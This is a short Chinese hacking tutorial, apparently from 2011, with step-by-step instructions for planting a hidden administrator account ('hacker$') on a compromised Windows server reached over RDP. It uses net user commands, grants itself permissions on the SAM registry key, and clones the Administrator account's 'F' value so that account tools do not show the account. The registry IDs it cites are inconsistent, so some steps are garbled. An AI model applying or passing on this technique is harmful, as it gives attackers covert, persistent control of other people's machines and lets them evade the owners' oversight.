通过注册表克隆帐户(建立3389下的不死账号)

2011/5/3 来源:www.arpun.com 作者:小白

1、以3389登录肉鸡, 创建一个新的帐户hacker$, 使用命令:net user hacker$ 123 /add 来创建。

  然后运行regedt32.exe, 依次展开子键HKEY_LOCAL_MACHINE\SAM\SAM, 右击选择“权限”项。

  2、在出现的“SAM 权限”对话窗口中, 点击“添加”将登录时的帐户添加到“组或用户名称”列

  如果还是不能展开子键, 请关闭后重新打开, 展开子键:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$, 在其右侧窗口中发现其默认值为0x3F1, 如图68所地。 下面将hacker$键、hacker$对应的项000003F1以及administrator所对应的项000001F4导出为hacker.reg、3EE.reg和1f4.reg, 退出。 用记事本分别打开导出的文件进行编辑, 将超级用户对应的项000001F4下的键“F”的值复制, 并覆盖hacker$对应的项000003EE下的键“F”的值, 然后将hacker.reg和3EE.reg合并为hacker.reg。 接下来在命令行下执行net user hacker$ /del将用户hacker$删除, 最后再将hacker.reg导入注册表即可。 `

  现在, 隐藏的超级用户hacker$已经建好了。 打开regedt32.exe, 把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子。

  注意:隐藏的超级用户建好后, 就在帐户管理器看不到hacker$这个用户, 在命令行用“net user”命令也看不到, 但是超级用户建立以后, 就不能再改密码了, 如果用net user命令来改hacker$的密码的话, 那么在帐户管理器中将又会看这个隐藏的超级用户了, 而且不能删除。

网友评论
评论(...
全部评论